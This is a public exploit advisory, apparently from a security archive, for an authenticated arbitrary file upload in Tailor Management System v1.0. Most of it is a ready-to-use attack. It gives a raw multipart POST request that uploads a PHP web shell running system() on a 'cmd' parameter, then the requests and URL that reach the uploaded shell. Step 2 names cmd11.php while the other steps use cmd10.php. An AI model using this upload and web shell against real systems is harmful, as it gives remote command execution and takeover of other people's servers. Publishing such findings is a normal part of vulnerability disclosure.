Tailor Management System - Arbitrary File Upload (Authenticated)

2020.10.10
Credit: mosaaed
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated) # Google Dork: N/A # Date: 2020-09-08 # Exploit Author: mosaaed # Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL # Version: v1.0 # Tested on: Kali linux # CVE: N/A Step 1 - Request POST /tailor/partedit.php?id=6 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901 Content-Length: 943 DNT: 1 Connection: close Referer: http://localhost/tailor/partedit.php?id=6 Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0 Upgrade-Insecure-Requests: 1 -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="type" 1 -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="title" HIPS -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="detail" Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily. -----------------------------374227061277520034476021901 Content-Disposition: form-data; name="bgimg"; filename="cmd10.php" Content-Type: application/x-php <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> -----------------------------374227061277520034476021901-- Step 2 - Response GET /tailor/img/part/cmd11.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://localhost/tailor/partedit.php?id=6 Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0 Step 3 - Read file uploaded http://localhost/tailor/img/part/cmd10.php


See this note in RAW Version
Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top